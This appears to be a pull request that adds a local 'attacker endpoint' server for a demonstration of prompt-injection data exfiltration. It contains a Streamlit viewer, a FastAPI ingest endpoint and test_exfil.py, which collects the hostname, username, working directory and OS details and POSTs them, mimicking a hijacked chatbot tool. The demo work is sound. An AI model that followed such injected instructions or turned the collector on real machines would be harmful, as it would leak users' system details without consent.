### PR TITLE
Add curl-log server for prompt-injection exfil demo

### DIFF
--- a/curl_log_server/.gitignore
+++ b/curl_log_server/.gitignore
@@ -1,0 +1,2 @@
+captured_logs.jsonl
+__pycache__/

--- a/curl_log_server/.streamlit/config.toml
+++ b/curl_log_server/.streamlit/config.toml
@@ -1,0 +1,7 @@
+[theme]
+base = "light"
+primaryColor = "#2563eb"
+backgroundColor = "#ffffff"
+secondaryBackgroundColor = "#f4f6fb"
+textColor = "#1f2733"
+font = "sans serif"

--- a/curl_log_server/README.md
+++ b/curl_log_server/README.md
@@ -1,0 +1,58 @@
+# Curl Log Server
+
+A small demo receiver for the Daxa prompt-injection exfiltration demo. It acts as
+the "attacker endpoint": it accepts POSTed JSON over raw HTTP, persists each request,
+and streams the captured data **live** in the browser (log-tail style) with a
+**Clear Data** button.
+
+This is the base infrastructure used to *demonstrate* (not perform) that an injected
+instruction was executed by an LLM-driven app. Everything runs locally with harmless,
+publicly-available data. **Local demo use only.**
+
+## Architecture
+
+A single `streamlit run` brings up two things in one process:
+
+- **Streamlit viewer** (default port `8600`) — live tail of captured requests + clear button.
+- **Embedded FastAPI ingest endpoint** (default port `8000`) — raw HTTP endpoint that
+  Streamlit cannot expose natively. Launched on a daemon thread, guarded so Streamlit's
+  script re-runs don't spawn duplicates.
+
+Captured entries are stored as JSON Lines in `captured_logs.jsonl`.
+
+## Files
+
+| File | Purpose |
+|------|---------|
+| `viewer_app.py`   | Streamlit entry point; starts the ingest server, renders the live tail |
+| `ingest_server.py`| FastAPI app (`POST /ingest`, `GET /health`) + background-thread launcher |
+| `log_store.py`    | Thread-safe append / read / clear of the JSONL store |
+
+## Run
+
+```bash
+pip install -r requirements.txt
+streamlit run viewer_app.py --server.port 8600
+```
+
+- Viewer:  http://localhost:8600
+- Ingest:  http://localhost:8000/ingest  (POST JSON)
+- Health:  http://localhost:8000/health
+
+## Test it
+
+```bash
+curl -X POST http://localhost:8000/ingest -H 'Content-Type: application/json' \
+     -d '{"os":"macOS 15","browser":"Chrome","demo":true}'
+```
+
+The entry appears in the viewer within ~2s, newest first, showing timestamp,
+source IP, and the JSON payload.
+
+## Configuration (env vars)
+
+| Var | Default | Meaning |
+|-----|---------|---------|
+| `CURL_LOG_INGEST_HOST` | `0.0.0.0` | Ingest bind host |
+| `CURL_LOG_INGEST_PORT` | `8000`    | Ingest port |
+| `CURL_LOG_FILE`        | `./captured_logs.jsonl` | JSONL store path |

--- a/curl_log_server/ingest_server.py
+++ b/curl_log_server/ingest_server.py
@@ -1,0 +1,81 @@
+"""Embedded FastAPI ingest endpoint for the curl-log demo server.
+
+Runs inside the Streamlit process on a daemon thread so a single
+`streamlit run viewer_app.py` brings up both the viewer and a raw HTTP
+endpoint that accepts the demo exfil POSTs.
+"""
+import logging
+import os
+import socket
+import threading
+
+import uvicorn
+from fastapi import FastAPI, Request
+
+import log_store
+
+log = logging.getLogger("curl_log_server.ingest")
+
+INGEST_HOST = os.getenv("CURL_LOG_INGEST_HOST", "0.0.0.0").strip() or "0.0.0.0"
+INGEST_PORT = int(os.getenv("CURL_LOG_INGEST_PORT", "8000"))
+
+app = FastAPI(title="Curl Log Ingest Server", docs_url=None, redoc_url=None)
+
+
+@app.get("/health")
+def health():
+    return {"status": "ok"}
+
+
+@app.post("/ingest")
+async def ingest(request: Request):
+    """Accept an arbitrary JSON body and persist it as a captured entry."""
+    try:
+        payload = await request.json()
+    except Exception:
+        # Fall back to raw text if the body is not valid JSON.
+        raw = (await request.body()).decode("utf-8", errors="replace")
+        payload = {"_raw": raw}
+
+    client_ip = request.client.host if request.client else ""
+    user_agent = request.headers.get("user-agent", "")
+    entry = log_store.append_entry(payload, client_ip=client_ip, user_agent=user_agent)
+    log.info("[ingest] captured entry from %s", client_ip)
+    return {"status": "ok", "received_at": entry["received_at"]}
+
+
+# --- Background launcher --------------------------------------------------
+
+_started = False
+_start_lock = threading.Lock()
+
+
+def _port_in_use(host: str, port: int) -> bool:
+    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
+        sock.settimeout(0.25)
+        # connect_ex == 0 means something is already listening.
+        return sock.connect_ex(("127.0.0.1" if host == "0.0.0.0" else host, port)) == 0
+
+
+def start_ingest_server_in_thread(host: str = INGEST_HOST, port: int = INGEST_PORT) -> None:
+    """Start uvicorn on a daemon thread. Idempotent across Streamlit re-runs.
+
+    Streamlit re-executes the whole script on every interaction, so this guards
+    against spawning duplicate servers or crashing on 'address already in use'.
+    """
+    global _started
+    with _start_lock:
+        if _started:
+            return
+        if _port_in_use(host, port):
+            # A server (this one, from a prior script run) is already listening.
+            _started = True
+            return
+
+        def _run():
+            uvicorn.run(app, host=host, port=port, log_level="warning")
+
+        thread = threading.Thread(target=_run, name="curl-log-ingest", daemon=True)
+        thread.start()
+        _started = True
+        log.info("[ingest] started on %s:%d", host, port)

--- a/curl_log_server/log_store.py
+++ b/curl_log_server/log_store.py
@@ -1,0 +1,59 @@
+"""File-backed persistence for captured exfil POSTs.
+
+Entries are stored one-JSON-object-per-line (JSON Lines) so they are trivially
+appendable and tailable. Both the FastAPI ingest thread and the Streamlit viewer
+thread touch this file, so all access is guarded by a process-wide lock.
+"""
+import json
+import os
+import threading
+from datetime import datetime, timezone
+
+_APP_DIR = os.path.dirname(os.path.abspath(__file__))
+
+# Path to the JSONL store; overridable via env for tests / alternate locations.
+LOG_FILE = os.getenv("CURL_LOG_FILE", "").strip() or os.path.join(_APP_DIR, "captured_logs.jsonl")
+
+_lock = threading.Lock()
+
+
+def append_entry(payload: dict, client_ip: str = "", user_agent: str = "") -> dict:
+    """Append one captured request as a JSON line and return the stored entry."""
+    entry = {
+        "received_at": datetime.now(timezone.utc).isoformat(),
+        "client_ip": client_ip,
+        "user_agent": user_agent,
+        "payload": payload,
+    }
+    line = json.dumps(entry, ensure_ascii=False)
+    with _lock:
+        with open(LOG_FILE, "a", encoding="utf-8") as fh:
+            fh.write(line + "\n")
+    return entry
+
+
+def read_entries() -> list:
+    """Return all stored entries, oldest first. Tolerant of a partial last line."""
+    with _lock:
+        if not os.path.exists(LOG_FILE):
+            return []
+        with open(LOG_FILE, "r", encoding="utf-8") as fh:
+            lines = fh.readlines()
+
+    entries = []
+    for line in lines:
+        line = line.strip()
+        if not line:
+            continue
+        try:
+            entries.append(json.loads(line))
+        except json.JSONDecodeError:
+            # Skip a half-written final line rather than failing the whole read.
+            continue
+    return entries
+
+
+def clear() -> None:
+    """Truncate the store, removing all captured entries."""
+    with _lock:
+        open(LOG_FILE, "w", encoding="utf-8").close()

--- a/curl_log_server/requirements.txt
+++ b/curl_log_server/requirements.txt
@@ -1,0 +1,3 @@
+streamlit>=1.33.0
+fastapi>=0.110.0
+uvicorn>=0.29.0

--- a/curl_log_server/test_exfil.py
+++ b/curl_log_server/test_exfil.py
@@ -1,0 +1,81 @@
+#!/usr/bin/env python3
+"""Simulate the Phase-B exfil tool against a running curl-log server.
+
+Collects *public* system / browser-style details (nothing sensitive) and POSTs
+them as JSON to the ingest endpoint — mimicking what the injected instruction
+would make the chatbot's tool do. For local demo use only.
+
+Usage:
+    python test_exfil.py                       # -> http://localhost:8000/ingest
+    python test_exfil.py http://host:8000/ingest
+    python test_exfil.py --count 3             # send N entries
+"""
+import argparse
+import getpass
+import json
+import os
+import platform
+import socket
+import sys
+import urllib.request
+from datetime import datetime, timezone
+
+DEFAULT_URL = "http://localhost:8000/ingest"
+
+
+def collect_system_info() -> dict:
+    """Public, non-sensitive system/browser-style metadata."""
+    uname = platform.uname()
+    return {
+        "collected_at": datetime.now(timezone.utc).isoformat(),
+        "os": platform.system(),
+        "os_release": platform.release(),
+        "os_version": platform.version(),
+        "platform": platform.platform(),
+        "machine": platform.machine(),
+        "processor": platform.processor(),
+        "hostname": uname.node or socket.gethostname(),
+        "python_version": platform.python_version(),
+        "user": getpass.getuser(),
+        "cwd": os.getcwd(),
+        # A synthetic user-agent-like string to mimic a browser fingerprint.
+        "user_agent": f"DaxaDemoClient/1.0 ({platform.system()} {platform.release()})",
+    }
+
+
+def send(url: str, payload: dict) -> None:
+    data = json.dumps(payload).encode("utf-8")
+    req = urllib.request.Request(
+        url, data=data, headers={"Content-Type": "application/json"}, method="POST"
+    )
+    with urllib.request.urlopen(req, timeout=5) as resp:
+        body = resp.read().decode("utf-8", errors="replace")
+        print(f"[{resp.status}] {url} -> {body}")
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser(description="Exfil-demo test client")
+    parser.add_argument("url", nargs="?", default=DEFAULT_URL, help="Ingest endpoint URL")
+    parser.add_argument("--count", type=int, default=1, help="How many entries to send")
+    args = parser.parse_args()
+
+    info = collect_system_info()
+    print("Collected system info:")
+    print(json.dumps(info, indent=2))
+    print(f"\nPOSTing {args.count} entr{'y' if args.count == 1 else 'ies'} to {args.url} …")
+
+    for i in range(args.count):
+        payload = dict(info)
+        if args.count > 1:
+            payload["_seq"] = i + 1
+        try:
+            send(args.url, payload)
+        except Exception as exc:
+            print(f"  FAILED: {exc}", file=sys.stderr)
+            return 1
+    print("\nDone. Check the viewer to confirm the entries appeared live.")
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/curl_log_server/viewer_app.py
+++ b/curl_log_server/viewer_app.py
@@ -1,0 +1,139 @@
+"""Curl Log Server — viewer.
+
+A Streamlit app that also hosts the raw HTTP ingest endpoint (embedded FastAPI
+thread). It streams captured exfil POSTs live, log-tail style, and lets you
+clear the captured data.
+
+Run:
+    streamlit run viewer_app.py --server.port 8600
+"""
+import json
+import urllib.request
+
+import streamlit as st
+
+import log_store
+from ingest_server import INGEST_HOST, INGEST_PORT, start_ingest_server_in_thread
+
+# Bring up the ingest endpoint (idempotent across Streamlit re-runs).
+start_ingest_server_in_thread()
+
+INGEST_DISPLAY_HOST = "localhost" if INGEST_HOST in ("0.0.0.0", "") else INGEST_HOST
+INGEST_URL = f"http://{INGEST_DISPLAY_HOST}:{INGEST_PORT}/ingest"
+HEALTH_URL = f"http://{INGEST_DISPLAY_HOST}:{INGEST_PORT}/health"
+
+st.set_page_config(page_title="Curl Log Server", page_icon="📡", layout="wide")
+
+# --- Light-mode styling & layout polish -----------------------------------
+st.markdown(
+    """
+    <style>
+      /* Keep the page comfortably centered and not too wide */
+      .block-container { max-width: 1100px; padding-top: 2.5rem; padding-bottom: 3rem; }
+
+      /* Status pill */
+      .status-pill {
+        display: inline-flex; align-items: center; gap: .5rem;
+        height: 44px; box-sizing: border-box; padding: 0 1rem; border-radius: 999px;
+        font-size: .9rem; font-weight: 600; white-space: nowrap;
+      }
+      .status-pill.ok   { background: #e7f6ec; color: #12794a; border: 1px solid #b6e3c6; }
+      .status-pill.down { background: #fdecec; color: #b42318; border: 1px solid #f4c4c0; }
+      .status-dot { width: .55rem; height: .55rem; border-radius: 50%; }
+      .status-pill.ok   .status-dot { background: #12b76a; }
+      .status-pill.down .status-dot { background: #f04438; }
+
+      /* Endpoint code chip */
+      .endpoint {
+        display: flex; align-items: center;
+        height: 44px; box-sizing: border-box;
+        background: #f4f6fb; border: 1px solid #e3e8f0; border-radius: 8px;
+        padding: 0 .85rem; font-family: ui-monospace, SFMono-Regular, Menlo, monospace;
+        font-size: .9rem; color: #1f2733; overflow-x: auto; white-space: nowrap;
+      }
+      .field-label {
+        font-size: .78rem; font-weight: 600; color: #667085;
+        text-transform: uppercase; letter-spacing: .04em; margin-bottom: .3rem;
+      }
+
+      /* Entry cards */
+      .entry-meta { font-size: .82rem; color: #667085; margin: 0 0 .1rem; }
+      .entry-title { font-size: .95rem; font-weight: 600; color: #1f2733; margin: 0; }
+
+      /* Align the Clear button vertically with the inputs on its row */
+      div[data-testid="stButton"] > button { width: 100%; height: 44px; }
+    </style>
+    """,
+    unsafe_allow_html=True,
+)
+
+
+def _ingest_healthy() -> bool:
+    try:
+        with urllib.request.urlopen(HEALTH_URL, timeout=1) as resp:
+            return resp.status == 200
+    except Exception:
+        return False
+
+
+# --- Header ---------------------------------------------------------------
+st.title("📡 Curl Log Server")
+st.caption(
+    "Demo receiver — captures POSTed data live to demonstrate that an injected "
+    "exfiltration instruction was executed. For local demo use only."
+)
+
+st.write("")
+
+# --- Status / endpoint / clear (one aligned row) --------------------------
+col_status, col_url, col_clear = st.columns([2, 5, 2], vertical_alignment="top", gap="large")
+
+with col_status:
+    st.markdown('<div class="field-label">Ingest server</div>', unsafe_allow_html=True)
+    if _ingest_healthy():
+        st.markdown(
+            '<span class="status-pill ok"><span class="status-dot"></span>Healthy</span>',
+            unsafe_allow_html=True,
+        )
+    else:
+        st.markdown(
+            '<span class="status-pill down"><span class="status-dot"></span>Down</span>',
+            unsafe_allow_html=True,
+        )
+
+with col_url:
+    st.markdown('<div class="field-label">Endpoint (POST JSON here)</div>', unsafe_allow_html=True)
+    st.markdown(f'<div class="endpoint">{INGEST_URL}</div>', unsafe_allow_html=True)
+
+with col_clear:
+    st.markdown('<div class="field-label">&nbsp;</div>', unsafe_allow_html=True)
+    if st.button("🗑️  Clear Data", use_container_width=True):
+        log_store.clear()
+        st.rerun()
+
+st.divider()
+
+
+@st.fragment(run_every="2s")
+def render_log_tail():
+    entries = log_store.read_entries()
+    st.subheader(f"Captured requests ({len(entries)})")
+    if not entries:
+        st.info("No requests captured yet. Waiting for incoming POSTs…")
+        return
+    # Newest first.
+    for entry in reversed(entries):
+        received = entry.get("received_at", "?")
+        ip = entry.get("client_ip", "?")
+        ua = entry.get("user_agent", "")
+        with st.container(border=True):
+            st.markdown(f'<p class="entry-title">🟢 from {ip}</p>', unsafe_allow_html=True)
+            meta = received if not ua else f"{received} · {ua}"
+            st.markdown(f'<p class="entry-meta">{meta}</p>', unsafe_allow_html=True)
+            st.code(
+                json.dumps(entry.get("payload", {}), indent=2, ensure_ascii=False),
+                language="json",
+            )
+
+
+render_log_tail()


### PR DESCRIPTION
Standalone Streamlit + embedded FastAPI app that acts as the "attacker endpoint" for the prompt-injection demonstration. Accepts POSTed JSON on a raw HTTP ingest endpoint, persists entries as JSONL, and streams them live in a browser viewer with a clear-data button.